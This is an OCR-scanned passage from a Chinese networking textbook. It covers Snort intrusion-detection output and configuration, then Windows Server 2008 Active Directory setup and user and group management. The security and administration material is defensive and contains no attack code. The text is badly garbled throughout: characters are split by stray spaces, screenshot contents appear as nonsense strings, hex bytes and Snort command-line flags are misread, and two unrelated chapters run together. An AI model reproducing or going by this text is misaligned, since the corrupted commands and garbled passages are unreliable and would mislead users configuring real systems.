Decoding Ethernet on interface eth0 
--== Initialization Complete == 一 一 

了 加 一 #> Snort! <* 一 

o" )~ Version 2.8.4 (Build 26) 
By Martin Roesch & The Snort Team: http://www. snort. org/team. html 
Copyright (C) 1998 - 2009 Sourcefire, Inc., et al. 
Using PCRE version: 6.6 06— Feb— 2006 
Not Using PCAP_FRAMES 
07/28 - 13:31:32.558389 219.246.5.86:137 -> 219.246.5.255:137 
UDP TTL:64 TOS:0x0 ID:23049 IpLen:20 DgmLen:96 
Len: 68 
87 1F 29 10 00 01 00 00 00 00 00 01 20 45 44 44 ..)......... EDD 
44 44 46 45 43 45 44 44 47 44 46 44 4A 44 45 45 DDFECEDDGDFDJDEE 
45 45 47 44 45 44 45 44 49 44 41 42 50 00 00 20 EEGDEDEDIDABP.. 
00 01 CO OC 00 20 00 01 00 04 93 EO0 00 06 00 00 .iii 
DB F6 05 56 吕 
=+=+=+= 二 = 十 = 二 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 
07/28 - 13:31:32. 633789 219.246.5.254 -> 224.0.0.5 
OSPF TTL:1 TOS:0xC0 ID:60180 IpLen:20 DgmLen:64 
02 01 00 2C 00 00 00 02 00 00 00 00 1A A8 00 00 .iiss 
00 00 00 00 00 00 00 00 FF FF FF 00 00 0A 0201 ieee 
00 00 00 28 DB F6 05 FE 00 00 00 00 a 
=+=+=+= 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 
07/28 - 13:31:33.309732 219.246.5.86:137 -> 219.246.5.255:137 
UDP TTL:64 TOS:0x0 ID:23050 IpLen:20 DgmLen:96 
Len: 68 
871F2910000100000000000120454444 ..).. EDD 
44 44 46 45 43 45 44 44 47 44 46 44 4A 44 45 45 DDFECEDDGDFDJDEE 
45 45 47 44 45 44 45 44 49 44 41 42 50 00 00 20 EEGDEDEDIDABP.. 
00 01 CO OC 00 20 00 01 00 04 93 EO0 00 06 00 00 ..... . 
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DB F6 05 56 5 
二 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 二 十 = 十 二 十 = 十 二 十 = 十 = 十 = 十 = 十 二 十 = 十 = 十 = 十 = 十 = 十 = 十 = 十 = 


2. Snort 工具 的 配置 

安装 成 功 后 ,下 面 简单 介绍 一 下 Snort 的 配置 。 进 行 配置 时 , 须 设置 /etc/snort/snort. conf 
文件 (与 实际 的 安装 目录 有 关 )。 

1) var HOME_NET 

配置 网 络 或 是 主机 的 IP, 如 果 只 有 一 台 服 务 器 ,就 可 以 只 输入 这 台 服 务 器 的 IP 地 址 ， 
如 果 机 器 有 两 个 以 上 的 IP, 则 使 用 下 面 的 方法 进行 配置 ; 

var HOME NET [192.168.2.1,192.168.2.2] 

或 

var HOME_NET 192.168.2.0/24 

2) var SMTP $ HOME_NET 

设置 SMTP 服务 器 的 位 置 ,如 果 与 HOME_NET 中 的 不 同 ,只 需 把 $ HOME_NET 
移 除 ,并 加 入 其 指定 SMTP 机 器 的 IP 便 可 。 

3) var HTTP_SERVERS $ HOME_NET 

设 定 HTTP 服务 器 ,设置 方法 与 SMTP 中 的 设 定 相 同 ,如 果 作 为 Web Server 的 不 是 
HOME_NET 机 器 ,可 以 指定 其 他 的 IP。 

4) var DNS_SERVERS 

设置 DNS 服务 器 的 IP 地 址 ,同时 需要 执行 下 列 命令 : 

preprocessor portscan ~ ignorehosts: $ DNS_SERVERS 

这 样 可 以 防止 因为 DNS 的 Lookup 而 记录 无 用 的 PortScan。 

输入 命令 运行 

#snort -~c /etc/snort/snort.conf -D -ieth0 

或 者 

#snort ~-c /etc/snort/snort.conf -D -ieth0 -1 /var/log/snort -s 


记录 存 至 目录 /var/log/snort 下 ,在 默认 情况 下 ,alerts 会 存放 在 /var/log/snort/alert， 
port-scanning 会 存放 在 /var/log/snort/portscan. log。 

Snort 的 设置 与 安装 都 比较 简单 ,尽管 Snort 所 做 的 工作 只 是 记录 及 提供 侦 测 ,但 是 该 
工作 也 很 重要 。 尽 管 许多 公司 都 安装 了 防火 墙 ,而 防火 墙 的 作用 只 是 帮助 管理 员 防 止 外 网 
的 攻击 ,如果 再 加 上 Snort 的 功能 ,网 络 管理 员 既 可 以 随时 了 解 黑客 对 公司 网 络 的 攻击 ,又 
同时 可 以 改变 防火 墙 的 规则 ,阻止 外 来 的 攻击 ,两 者 结合 起 来 ,才能 更 好 地 保护 内 部 网 络 。 

安全 是 不 断 提高 抗 攻 击 能 力 、 评 估 受 保护 网 络 的 保护 程度 的 一 个 循环 过 程 ,上 面 的 这 几 
个 工具 可 以 保护 服务 器 免 受 部 分 攻击 ,确保 服务 器 按 要 求 和 需要 进行 工作 ,并 可 以 分 析出 现 
意外 事件 时 的 网 络 通信 记录 。 当 使 用 这 些 工 具 时 ,需要 了 解 安全 的 三 个 步骤 : 预防 、 检 查 和 
响应 。 如 果 能 够 事先 对 入 侵 进行 预防 ,可 以 较 好 地 保护 系统 ,因为 一 旦 发 生 入 侵 事件 ,其 代 
价 将 是 高 昂 的 ,并 且 可 能 丢失 重要 的 数据 。 
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本 章 学 习 要 求 : 

。 掌握 安装 Windows Server 2008 系统 的 基本 过 程 。 

。 掌握 在 计算 机 上 创建 活动 目录 ,并 管理 域内 计算 机 的 方法 。 
。 掌握 DHCP 服务 的 概念 ,原理 .安装 以 及 配置 方法 。 

。 掌握 DNS 服务 的 概念 .原理 、 安 装 以 及 配置 方法 。 

。 掌握 Web 服务 的 概念 ,原理 ,安装 以 及 配置 方法 。 

。 掌握 FTP 服务 的 概念 、 原 理 、 安 装 以 及 配置 方法 。 

。 掌握 MAIL 服务 的 概念 、 原 理 、 安 装 以 及 配置 方法 。 

。 掌握 VPN 服务 的 概念 、 原 理 、 安 装 以 及 配置 方法 。 

。 掌握 利用 NTFS 实现 文件 系统 的 安全 。 

。 掌握 数据 备份 .还 原 的 方法 。 

。 熟悉 Windows Server 2008 系统 的 基本 安全 配置 过 程 。 


10.1 Windows Server 2008 操作 系统 的 安装 


10.1.1 Windows Server 2008 操作 系统 安装 的 硬件 要 求 


在 安装 Windows Server 2008 前 ,要 对 自己 的 硬件 有 大 致 的 了 解 ,在 表 10-1 中 ,给 出 了 
Windows Server 2008 安装 时 所 需 的 最 低 系 统 要 求 和 建议 系统 要 求 , 应 逐 项 检查 计算 机 的 
硬件 是 否 符合 要 求 。 


表 10-1 Windows Server 2008 系统 要 求 和 建议 系统 要 求 


硬件 名 称 参数 要 求 
处 理 器 最 低 1.0GHz x86 或 1.4GHz x64; 推荐 2. 0GHz 或 更 高 
内 存 最 低 512MB; 推荐 2GB 或 更 多 


内 存 最 大 支持 | 32 位 标准 版 4GB, 企 业 版 和 数据 中 心 版 64GB; 64 位 标准 版 32GB, 其 他 版 本 2TB 

硬盘 最 少 10GB, 推 荐 40GB 或 更 多 (内 存 大 于 16GB 的 系统 需要 更 多 空间 用 于 页 面 、 休 了 眠 和 
转 存储 文件 ) 

其 他 光驱 要 求 DVD-ROM; 显示 器 要 求 至 少 SVGA 800X600 分 辩 率 ,或 更 高 


10.1.2 Windows Server 2008 操作 系统 的 安装 方法 介绍 


目前 Windows Server 2008 系统 的 安装 方法 主要 有 三 种 : 从 CD-ROM 引导 ,通过 网 络 
安装 ,借助 早期 的 操作 系统 。 这 三 种 安装 方法 中 ,第 一 种 最 为 普遍 。 
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由 于 篇 幅 有 限 ,此 处 对 Windows Server 2008 的 安装 不 再 进行 介绍 ,读者 可 参阅 相关 
书籍 。 


10.2 Windows Server 2008 活动 目录 介绍 与 配置 


10.2.1 活动 目录 概念 介绍 


1. 活动 目录 的 概念 

微软 公司 在 2000 年 发 布 了 Windows 2000, 与 1996 年 发 布 的 Windows NT 4.0 相 比 ， 
最 大 的 优点 就 是 提出 了 Active Directory( 活 动 目 录 )。 活 动 目录 主要 体现 在 以 下 4 个 方面 。 

。 活动 目录 中 对 象 的 数目 是 没有 限制 的 。Windows NT 4.0 中 对 象 的 数目 不 超过 4 万 
个 , 域 中 没有 活动 目录 的 概念 ,如 果 一 个 域 中 有 超过 4 万 个 对 象 就 必须 使 用 多 域 进 
行 管理 。 而 在 Windows Server 2008 的 活动 目录 中 可 以 认为 对 象 的 数目 是 没有 限制 
的 ,可 以 是 十 万 或 百 万 甚至 更 多 。 
活动 目录 中 对 象 的 属性 可 以 增加 。 每 一 个 对 象 都 是 用 它 的 属性 进行 描述 的 ,活动 目 
录 对 象 的 管理 实际 上 就 是 对 对 象 属性 的 管理 ,而 对 象 的 属性 是 可 能 发 生 改变 的 。 
可 以 方便 地 添加 或 删除 域 。 在 Windows Server 2008 中 利用 活动 目录 可 以 方便 地 创 
建 域 . 域 树 \ 域 目录 林 的 逻辑 结构 。 对 于 域 树 来 说 ,如 果 把 域 树 中 某 个 子 域 删除 ,将 
不 会 影响 其 他 子 域 和 父 域 的 运行 ,还 可 以 在 子 域 下 再 创建 其 他 子 域 。 
利用 活动 目录 管理 网 络 资源 有 以 下 特点 : 方便 组 织 资源 、 方 便 信息 组 织 和 查找 、 方 
便 集 中 管理 和 分 布 管理 相 结合 的 资源 访问 的 分 级 管理 。 

2. 活动 目录 对 象 的 概念 

简单 来 说 ,在 活动 目录 中 可 以 被 管理 的 一 切 资 源 都 称 为 活动 目录 对 象 ,活动 目录 的 资源 
管理 就 是 活动 目录 对 象 的 管理 ,包括 设置 对 象 的 属性 和 安全 等 。 

3. 活动 目录 域 的 概念 

域 (Domain) 是 Windows Server 2008 活动 目录 逻辑 结构 的 核心 单元 ,是 活动 目录 对 象 
存储 的 地 方 。 它 定义 了 一 个 安全 的 边界 , 域 中 所 有 对 象 都 保存 在 域 中 ,在 这 个 安全 的 管理 范 
围 内 进行 统一 管理 。 每 个 域 只 保存 属于 该 域 的 对 象 ,只 能 管理 本 域 。 安 全 边界 的 作用 就 是 
保证 域 的 管理 者 只 能 在 该 域内 拥有 必要 的 管理 权限 ,如 果 想 管理 其 他 域 ,必须 得 到 其 他 域 管 
理 者 的 授权 。 

4. 活动 目录 域 树 的 概念 

域 树 (Domain Tree) 是 由 一 组 具有 连续 命名 空间 的 域 组 成 ,下 面 用 一 个 例子 来 说 明 。 

比如 一 个 企业 最 初 只 有 一 个 域名 为 gsl. com, 后 来 该 企业 发 展 ,在 西安 开 了 一 家 分 公 
司 ,出 于 安全 的 考虑 需要 新 创建 一 个 域 .可 以 把 这 个 域 添加 到 现 有 的 目录 中 。 这 个 新 域 
xian. gsl. com 就 是 现 有 域 gsl. com 的 子 域 , 随 着 公司 的 发 展 还 可 以 在 gsl. com 下 创建 另 一 
个 子 域 chongqing. gsl. com, 这 两 个 子 域 互 为 兄弟 域 。 

5. 活动 目录 中 的 森林 的 概念 

森林 (Forest) 是 一 组 彼此 互 连 的 域 树 ,每 棵 域 树 独 享 连 续 的 命名 空间 ,不 同 域 树 之 间 没 
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有 命名 空间 的 连续 性 。 

将 所 有 的 域 和 域 树 组 织 起 来 构成 一 个 共同 的 森林 的 那些 彼此 交 秋 的 特性 体现 了 共同 的 
架构 和 全 局 目录 。 

6. 组 织 单位 


组 织 单位 (OU) 是 活动 目录 中 的 一 个 特殊 容器 , 它 可 以 把 用 户 、 组 、 计 算 机 和 打印 机 等 
对 象 组 织 起 来 。 与 一 般 的 容器 仅 能 容纳 对 象 不 同 ,组织 单位 不 仅 可 以 包含 对 象 ,而 且 可 以 进 
行 策略 设置 和 委派 管理 ,普通 用 户 是 不 能 办 到 的 。 

组 织 单位 是 活动 目录 中 最 小 的 管理 单元 。 当 一 个 域 中 的 对 象 数目 非常 多 时 ,可 以 用 组 
织 单位 把 一 些 具 有 相同 管理 要 求 的 对 象 组 织 在 一 起 ,这 样 可 以 实现 分 级 管理 ,而 且 作为 域 管 
理 员 还 可 以 指定 某 个 用 户 区 管理 某 个 组 织 单位 。 

7. 域 控制 器 

域 控 制 器 (DC) 实 际 上 是 存储 活动 目录 的 地 方 ,用 来 管理 用 户 登录 进程 、 验 证 和 目录 搜 
索 的 任务 。 一 个 域 中 可 以 有 一 台 或 多 台 DC, 为 了 保证 用 户 访问 活动 目录 信息 的 一 致 性 , 需 
要 在 各 DC 之 间 实 现 活动 目录 复制 。 

在 Windows Server 2008 中 采用 活动 目录 的 多 主 复制 方式 , 即 每 台 DC 都 维护 着 活动 
目录 的 副本 ,管理 其 变化 和 更 新 。 

8. 站 点 

站 点 (Site) 一 般 与 地 理 位 置 相对 应 , 它 由 一 个 或 几 个 物理 子 网 组 成 。 创 建站 点 的 目的 
是 为 了 优化 DC 之 间 复 制 的 通信 量 。 站 点 具有 如 下 特点 。 

。 一 个 站 点 可 以 有 一 个 或 多 个 网 段 。 

。 一 个 站 点 中 可 以 有 一 个 或 多 个 域 。 

。 一 个 域 可 以 属于 多 个 站 点 。 


10.2.2 活动 目录 的 安装 


Windows Server 2008 提供 了 一 个 活动 目录 的 安装 过 程 , 在 安装 完成 后 ,计算 机 会 发 生 
一 些 变化 ,为 了 验证 这 些 变化 ,首先 创建 一 个 本 地 用 户 zhangsan。 创 建 用 户 的 具体 操作 是 : 
右键 选中 “计算 机 ”, 在 出 现 的 菜单 中 选择 “管理 ”, 在 弹出 的 界面 中 选择 “本 地 用 户 和 组 ”, 右 
键 选 中 “用 户 ”, 在 出 现 的 菜单 中 选择 “新 用 户 ”, 在 弹出 的 对 话 框 中 输入 用 户 名 、 密 码 和 相关 
信息 , 单 击 “ 确 认 ” 按 钮 即 可 。 

下 面 来 详细 介绍 一 下 活动 目录 的 安装 和 设置 过 程 。 

(1) 通过 “服务 器 管理 器 ”安装 Active Directory 服务 ,操作 步骤 是 : 选择 “开始 ”一 “ 管 
理工 具 ”>“ 服 务 器 管理 器 ” ,打开 “ 服 务 器 管理 器 ”窗口 , 单 击 “ 角 色 ”, 选 择 “ 添 加 角色 ”进入 
“开始 之 前 ”界面 , 单 击 “ 下 一 步 ”按钮 进入 “选择 服务 器 角色 ”界面 ,如 图 10-1 所 示 。 

(2) 单 击 “下 一 步 ” 按 钮 进入 “Active Director 域 服务 ”界面 。 

(3) 单 击 “ 下 一 步 ” 按 钮 进入 “确认 安装 选择 ”界面 。 

(4) 选择 “关闭 向 导 并 启动 Active Director 域 服务 安装 向 导 (dcpromo. exe)”, 进 入 “ 欢 
迎 使 用 ”界面 

(5) 单 击 “下 一 步 按 钮 ,进入 “操作 系统 兼容 性 界面 ,在 此 提示 有 关 操 作 系 统 兼容 性 的 
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添加 角色 向 导 四 


选择 要 安装 在 此 服务 器 上 的 一 个 或 多 个 角色 。 
角色 四 ): 撕 述 ; 
Active Directory 域 服务 口 ketive Directory Rights Nanagenent Services 4 
确认 DD Active Directery ti ee 
目录 服 : 


进度 


用 域 控制 址 癌 jd 络 | 
站 
结果 允许 资源 的 权限 。 


让 windows 部 时 服务 
口 传真 服务 器 
口 打 p 服 务 


sv TBw] 0 | mlsl@| 
图 10-1 角色 选择 界面 


信息 。 为 了 更 好 地 利用 Windows Server 2008 所 提供 的 安全 特性 ,建议 域 中 的 成 员 服务 器 
的 操作 系统 最 好 是 Windows Server 2000 以 上 ,和 否则 无 法 完全 发 挥 Windows Server 2008 的 
特点 。 

(6) 单 击 * 下 一 步 ? 按 钮 ,进入 "选择 某 一 部 署 设置 "界面 ,在 此 界面 选择 要 创建 域 的 类 
型 ,选中 “在 新 林 中 新 建 域 ”。 

(7) 单 击 * 下 一 步 ”按钮 ,进入 “命名 林 根 域 * 界 面 ,在 此 界面 要 为 创建 的 域 指定 FQDN 
名 称 , 此 处 指定 的 FQDN 名 称 为 testexample. com。 

(8) 单 击 “ 下 一 步 ”按钮 ,检查 是 否 已 经 在 使 用 新 域 ,并 验证 NetBIOS 名 称 ,然后 进入 
“设置 新 林 功 能 级 别 ” 界 面 ,在 此 选择 新 林 功 能 级 别 , 有 三 种 ,分 别 是 Windows 2000、 
Windows Server 2003、Windows Server 2008。 选 择 Windows Server 2008( 此 林 功 能 级 别 不 
提供 Windows 2003 林 功 能 级 别 以 上 的 任何 新 功能 。 但 是 , 它 确保 在 该 林 中 创建 的 任何 新 
域 将 自动 在 Windows Server 2008 域 功能 级 别 运行 ,这 样 可 提供 独特 的 功能 ), 如 图 10-2 
所 示 。 

(9) 单 击 “下 一 步 ? 按 钮 ,进入 "其 他 域 控制 器 选项 "界面 。 

(10) 单 击 “ 下 一 步 "按钮 ,检查 DNS 配置 。 

(11) 单 击 “ 下 一 步 ” 按 钮 ,进入 “数据 库 、 日 志文 件 和 SYSVOL 的 位 置 " 界 面 ,在 此 选择 
活动 目录 数据 库 和 日 志文 件 的 存放 位 置 , 数据库 .日 志文 件 默认 情况 下 存放 在 
%systemroot%\NTDS 文件 夹 下 ,SYSVOL 默认 情况 下 存放 在 %systemroot%\SYSVOL 
文件 夹 下 ,也 可 以 改变 位 置 。 
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R 
< 上- 步 ®) 取消 


图 10-2 域 服务 安装 向 导 界 面 


(12) 单 击 “ 下 一 步 ”按钮 ,进入 “目录 服务 还 原 模式 的 Administrator 密码 ”界面 ,在 此 为 
Administrator 账户 分 配 一 个 密码 。 

(13) 单 击 “ 下 一 步 ” 按 钮 ,系统 会 自动 到 DNS 服务 器 中 查找 是 否 有 相应 的 DNS 区 域 ， 
如 果 DNS 服务 器 上 有 相应 的 DNS 区 域 , 并 设置 了 动态 更 新 , 则 立即 进行 安装 ,和 否则 会 进入 
DNS 诊断 界面 ,在 此 界面 上 选中 “在 这 台 计 算 机 上 安装 并 配置 DNS 服务 器 ,并 将 这 台 DNS 
服务 器 设 为 这 台 计 算 机 的 首选 DNS 服务 器 ”。 

(14) 单 击 “ 下 一 步 ” 按 钮 ,进入 “权限 ”界面 ,在 此 选择 用 户 和 组 对 象 的 默认 权限 ,在 此 选 
中 “Windows Server 2008 操作 系统 兼容 的 权限 ”。 

(15) 单 击 * 下 一 步 "按钮 ,进入 "目录 服务 还 原 模 式 的 管理 员 密 码 界面。 在 此 需要 指定 
“目录 服务 还 原 模式 ?下 的 管理 员 密 码 。 

(16) 单 击 “ 下 一 步 ” 按 钮 ,进入 “摘要 ”界面 ,在 此 会 给 出 以 上 各 步骤 选择 结果 的 汇总 。 

(17) 单 击 “下 一 步 按 钮 ,开始 安装 活动 目录 ,如 图 10-3 所 示 。 


ive Directory 域 服务 去 装 向 导 


晤 本 颖 Aetive 并 域 服务 。 此 过 程 可 能 需要 几 分 钟 到 由 


图 10-3 ”安装 活动 目录 界面 


(18) 安装 完成 后 ,会 出 现 安装 完成 界面 , 单 击 “ 完 成 "按钮 。 安 装 完成 后 ,提示 重新 启动 
计算 机 才 会 生效 。 
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(19) 单 击 “ 立 即 重新 启动 ”按钮 ,重新 启动 后 该 计算 机 就 以 域 控制 器 的 角色 出 现在 网 
络 中 。 
至 此 活动 目录 安装 完成 。 


10.2.3 活动 目录 的 验证 


验证 活动 目录 安装 成 功 的 方法 有 下 面 几 种 。 

1. 查看 域 控制 器 的 计算 机 名 

安装 活动 目录 后 ,计算 机 名 会 发 生变 化 ,具体 操作 是 : 右键 单 击 “ 计 算 机 ”, 选 择 “ 属 性 ” 
命令 ,在 弹出 的 “系统 属性 ”对 话 框 中 选择 “计算 机 名 ”选项 卡 ,可 以 查看 当前 域 控制 器 的 计算 
机 名 。 

2. 查看 管理 工具 

具体 步骤 为 : 选择 “开始 ”一 “管理 工具 ”, 可 以 看 到 新 增加 了 5 个 关于 活动 目录 的 相关 
工具 。 分 别 是 : 

。 Active Directory 用 户 和 计算 机 。 

。 Active Directory 域 和 信任 关系 。 

。 Active Directory 站 点 和 服务 。 

。 域 安 全 策略 。 

。 域 控制 器 安全 策略 。 

3. 查看 用 户 和 组 账号 的 位 置 

目录 安装 成 功 后 ,计算 机 上 用 户 和 组 账号 的 位 置 会 发 生变 化 , 当 一 台 计 算 机 升级 为 域 控 
制 器 时 , 原 有 的 本 地 用 户 和 组 账号 变 为 域 中 的 用 户 和 组 账号 。“ 本 地 用 户 和 组 ”就 会 消失 。 

除了 上 面 的 几 种 验证 方法 外 ,还 有 查看 SYSVOL 文件 夹 .查看 活动 目录 数据 库 和 日 志 
文件 .查看 DNS 数据 库 和 查看 事件 日 志 , 这 里 不 再 做 详细 介绍 。 


10.2.4 将 计算 机 加 入 到 域 中 


为 了 更 好 地 管理 网 络 中 的 资源 ,充分 利用 活动 目录 的 特点 ,应 该 把 网 络 中 的 计算 机 加 入 
到 域 中 ,这样 域 管理 员 就 可 以 集中 对 域 中 的 计算 机 进行 配置 和 管理 。 下 面 是 把 一 台 客 户 端 
加 入 到 域 的 过 程 。 

(1) 在 客户 端的 计算 机 上 ,右键 单 击 * 计 算 机 ”, 选 择 “ 属 性 ”命令 ,在 弹出 的 “系统 属性 ” 
对 话 框 中 选择 “计算 机 名 ”选项 卡 。 

(2) 单 击 “ 更 改 ”, 然 后 单 击 “ 确 定 ” 按 钮 ,在 弹出 的 用 户 名 和 密码 文本 框 中 输入 加 入 该 域 
的 用 户 名 称 和 密码 。 

(3) 最 后 出 现 重 新 启动 对 话 框 ,重启 计算 机 即 可 。 重 新 启动 后 ,登录 界面 有 所 改变 。 


10.2.5 在 活动 目录 中 管理 用 户 和 组 账号 


1. 在 域 控制 器 中 创建 新 用 户 


当 有 新 的 用 户 需 要 访问 域 中 的 资源 时 ,就 需要 创建 一 个 新 的 用 户 ,创建 用 户 账号 的 步 又 
如 下 。 
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(1) 首先 打开 Active Directory 控制 台 ,选择 “开始 ”> “管理 工具 ”一 “服务 器 管理 器 ” 
界面 。 

(2) 选择 域 控制 器 中 的 “管理 Active Directory 中 的 用 户 和 计算 机 ”, 如 图 10-4 所 示 , 右 
键 选择 Users 容器 ,在 弹出 的 菜单 中 选择 新建”>“ 用 户 ” 命 令 , 打 开 “ 新 建 对 象 -用 户 ” 对 话 
框 ,输入 用 户 的 名 字 ( 如 “ 王 五 ”) 以 及 登录 信息 。 


屁 服务 中 管 理 妥 a =I9lx| 
文件 g) 操作 查看 W 帮助 吕 
CT EA el 
EY EE testeranple con 
日 过 外 色 
日 霸 hctive Directory 域 服 # 
日 避 Active Directory 计 
testexanple. con 


困 因 ketive Directory 站 四 2 0 


5 个 对 象 【启动 往 选 器 ] 


testexanple. con < 
更 多 操作 


uiltin builtinDomein 
本 coputers 容器 Default container fo 


[ [lsl@|: 


图 10-4 Active Directory 控制 台 


(3) 单 击 “ 下 一 步 ” 按 钮 ,开始 为 用 户 设置 密码 。 

此 处 有 以 下 4 个 选项 。 

。 用 户 下 次 登录 时 须 更 改 密码 : 该 选项 表明 用 户 下 次 登录 时 系统 将 提示 用 户 重 新 输 
入 新 的 密码 ,该 功能 使 管理 员 无 法 知道 用 户 的 密码 ,保证 用 户 的 密码 只 有 本 人 知道 ， 
但 是 管理 员 可 以 修改 用 户 的 密码 。 

。 用 户 不 能 更 该 密码 : 该 选项 与 上 面 的 选项 相反 。 选 中 此 选项 ,用 户 的 密码 将 不 能 被 

修改 。 

密码 永 不 过 期 : 选中 此 选项 ,该 账号 的 密码 将 永 不 过 期 ,在 Windows Server 2008 中 

默认 的 密码 过 期 时 间 为 42 天 ,密码 过 期 后 用 户 将 无 法 登录 计算 机 。 

账户 已 禁用 : 选中 此 项 ,该 账号 即 被 停 用 , 当 一 个 用 户 短期 离开 公司 时 可 以 将 账号 

禁用 , 当 用 户 回 来 时 由 管理 员 重 新 启动 该 账号 。 

(4) 单 击 “下 一 步 "按钮 ,进入 “创建 完成 ?界面 , 单 击 * 完 成 "按钮 。 

(5) 双击 Users 容器 ,查看 创建 结果 ,如 图 10-5 所 示 。 

2. 在 域 控 制 器 中 创建 组 账号 

创建 组 的 目的 是 为 了 集中 管理 用 户 ,下 面 来 简单 介绍 一 下 组 的 创建 过 程 。 


[= 
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民 服务 器 管理 器 | 
文件 F) 操作 CO。 查看 帮助 00 
各 划 | 四 | 曾 | 相 蝗 | 基 目 国 国 | 
服务 器 管理 器 QWTN-HEVP3CGZZY 
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日 Active Directory 域 服 # Administr. 用 户 管理 计算 机 4 号 ) 的 内 置 
日 旦 Direetry 天 | 最 monea .安全 组 - 本 .。 允许 持 此 组 中 成员 的 本 
相国 miltin ”| 中 cert Publ..。 安全 组 - 本 .， 此 组 的 成 员 被 许 发 布 
田 国 Conpatrs | 中 Daied 80..。 安全 组 - 本 .. ， 不 允许 将 此 组 中 成 员 的 
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回国 Foreigseewr | 驶 Dnstpdate..。 安全 组 - 全 局 。 允许 苦 其 他 客户 应 c 
卫 而 二 跟 Domasin Ad . 。 安全 组 - 全 局 。 指定 的 域 管理 员 
回 下 hctive Directory 麻 | 跑 Donain co。 安全 组 - 全 局 。 加 入 到 域 中 的 所 有 工作 
TIS 服务 器 中 Domsin co..。 安全 组 - 全 局 。 域 中 所 有 域 控制 器 
跑 Domuin ca .。 安全 组 - 全 局 。 域 的 所 有 来 宾 
跑 Donsin Users 去 全 组 - 全 局 。 所 有 域 用 户 
ee 跑 Enterpris..。 安全 组 - 通用 。 企业 的 指定 系统 管理 员 
任务 计划 程序 。 | 跑 Enterpris .安全 组 - 通用 。 该 组 的 成 员 是 企业 中 的 
日 电 高 级 安全 Yindovs 防 兴 | 这 个 姐 中 的 成 员 可 以 修 
供 来 喜 访 问 计算 机 或 访 
这 个 组 中 的 服务 器 可 以 
此 组 中 的 成 员 是 域 中 只 
架构 的 湛 定 系统 管理 员 
到 
Tr 下 三 [一 | 1 


图 10-5 添加 用 户 完成 界面 


右键 选择 Users 容器 ,在 弹出 的 菜单 中 选择 “新 建 ”>“ 组 "命令, 打开“ 新建 对 象 -组 ”对 
话 框 ,输入 组 名 (如 “GROUP1”)。 单 击 “ 确 定 ” 按 钮 ,创建 组 完成 ,创建 结果 如 图 10-6 所 示 。 
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困 风 Acetive Directory 站 中 Domain Co， 安全 组 - 全 局 。 加 入 到 域 中 的 所 有 工作 . 
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uest 用 户 供 来 宾 访 问 计算 机 或 访 
跑 EMs and I .， 安 全 组 - 本 .、 这 个 组 中 的 服务 器 可 以 … 
观 Read-only..。 安全 组 - 全 局 。 此 组 中 的 成 员 昨 域 中 内. 
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10-6 添加 组 结果 界面 
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3. 在 域 控制 器 中 将 用 户 添加 到 组 


将 刚 创 建 的 用 户 添加 到 刚 创建 的 组 中 ,即将 用 户 “ 王 五 ”添加 到 组 “GROUP1” 中 ,具体 


步骤 如 下 。 
(1) 在 图 10-5 的 界面 上 ,右键 选中 用 户 “ 王 五 ”, 选 择 “ 添 加 到 组 ”命令 。 
(2) 单 击 “高 级 "按钮 ,可 进行 查找 。 


(3) 单 击 “ 立 即 查找 ”按钮 ,选中 组 “GROUP1”, 单 击 “ 确 定 ” 按 钮 ,如 图 10-7 所 示 。 


5 
选择 此 对 象 类 型 G) 
隐 二 内 要 到 全 主体 对 象 类 型 0) 
查找 位 置 F): 
IE om 
输入 对 象 名 称 末 选 择 示例 ) EE): 
检 可 名称 C) 


高 级 人. 确定 取消 | 


图 10-7 添加 组 完成 界面 
(4) 单 击 “ 确 定 ” 按 钮 ,进入 完成 界面 , 单 击 “ 确 定 ” 按 钮 。 
4. 在 域 控制 器 中 设置 用 户 的 属性 


用 户 账号 * 属 性” 对话 框 共有 16 个 选项 卡 ,要 想 全 部 显示 这 16 个 选项 卡 , 需 在 “Active 


Directory 用 户 和 计算 机 ”控制 台中 选择 “查看 ”一 “高 级 功能 ”选项 即 可 。 

具体 步骤 如 下 。 

(1) 在 图 10-5 中 右键 选中 用 户 “ 王 五 ”, 选 择 “ 属 性 ”命令 ,如 图 10-8 所 示 。 这 里 
户 ” 选 项 卡 的 “登录 时 间 ” 和 “登录 到 ”进行 说 明 ,其 他 选项 卡 不 再 详细 介绍 。 


wx 
一 一 一 -一 | 对 象 | 安全 | 环 填 
| | | 终 庙 服务 配置 文件 | Co 。 | 属性 编辑 器 
总 | 地 址 HE jr | 
， 用 户 登 录 名 中: 
Jetestexuple. cm 了 上 
用 户 登录 名 Windows 2000 以 前 版 本 ) 0): 
， fom EE 
Hw... | 全 a 到 m... | 
"Mik on) 
账户 选 硕 ); 
厂 用 户 下 次 登录 时 须 更 改 灾 码 到 
| 
反 密 码 永 不 过 期 
厂 使 用 本 北 的 加 密 保 存 密码 z| 
账户 过 期 
个 未 不 过 期 0 
人 在 这 之 后 9): FE IT 5 > 
取消 应 用 鸭 部 且 


10-8 用户 属 性 界面 


只 对 “ 账 
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(2) 单 击 “ 登 录 时 间 ” 按 钮 ,打开 “登录 时 间 ” 对 话 框 ,如 图 10-9 所 示 。 
在 此 界面 中 可 设置 用 户 登 录 域 的 时 间 段 ,其 中 蓝 色 表示 可 以 登录 ,白色 表示 不 可 以 登 
录 , 从 而 提高 网 络 的 安全 性 。 
假如 公司 的 上 班 时 间 是 每 周一 至 周 五 的 8 点 到 17 点 ,而 用 户 王 五 想 在 周 六 的 晚上 6 点 
到 10 点 加 班 ,就 可 以 按照 图 10-10 设置 。 
EEC > 


《 的 LL 崇 
了 0 Ee 


星期 六 
1 星期 日 至 星期 六 从 0:00 点 到 0:00 点 


图 10-9 用 户 账号 登录 时 间 


LEEEEEETTI 的 登录 时 间 x 
! 全 
和 睛 富 
i 


| Wi 2 
个 拒绝 登录 中 ) 


Wi 


星期 六 从 18:00 点 到 22:00 点 


图 10-10 设置 用 户 允许 登录 时 间 段 


(3) 单 击 “ 登 录 到 ”按钮 ,打开 “登录 工作 站 ”对 话 框 。 选 中 “下 列 计算 机 ” 复 选 框 ,输入 计 
